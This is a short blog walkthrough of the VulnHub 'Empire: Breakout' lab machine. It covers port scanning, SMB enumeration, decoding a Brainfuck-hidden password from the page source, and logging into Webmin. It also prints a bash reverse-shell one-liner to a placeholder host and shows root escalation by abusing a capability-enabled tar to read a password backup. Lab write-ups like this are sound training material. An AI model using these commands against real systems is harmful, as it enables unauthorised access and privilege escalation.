VulnHub: Empire: Breakout
3 min readMay 28, 2022
Today we will take a look at Vulnhub: Breakout. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network scan
nmap -p- -sV -sC --open 192.168.0.109PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10000/tcp open http MiniServ 1.981 (Webmin httpd)
|_http-server-header: MiniServ/1.981
|_http-title: 200 — Document follows
20000/tcp open http MiniServ 1.830 (Webmin httpd)
|_http-server-header: MiniServ/1.830
|_http-title: 200 — Document follows
- Enum4linux
Command: enum4linux -a 192.168.0.109
We found a username here
- Web
If we look at the bottom of the page’s source code, we see a text encrypted by the brainfuck algorithm.
view-source:http://192.168.0.109/
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
-->If we decode, we get the password.
.2uqPEfj3D<P'a-3- Reverse Shell
When we look at port 20000, it redirects us to the admin panel with a link
Username: cyberPassword: .2uqPEfj3D<P'a-3
Once logged in, there is a terminal icon on the bottom left. With its we can carry out orders. I’ll get a reverse shell.
bash -i >& /dev/tcp/YourIP/1234 0>&1
- Root
Command: getcap -r / 2>/dev/null
/home/cyber/tar cap_dac_read_search=epcyber@breakout:~$ ./tar -cvf old_pass /var/backups/.old_pass.bakcyber@breakout:~$ ./tar -xvf old_passcyber@breakout:~$ cat var/backups/.old_pass.bak
Ts&4&YurgtRX(=~hcyber@breakout:~$ su root
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”
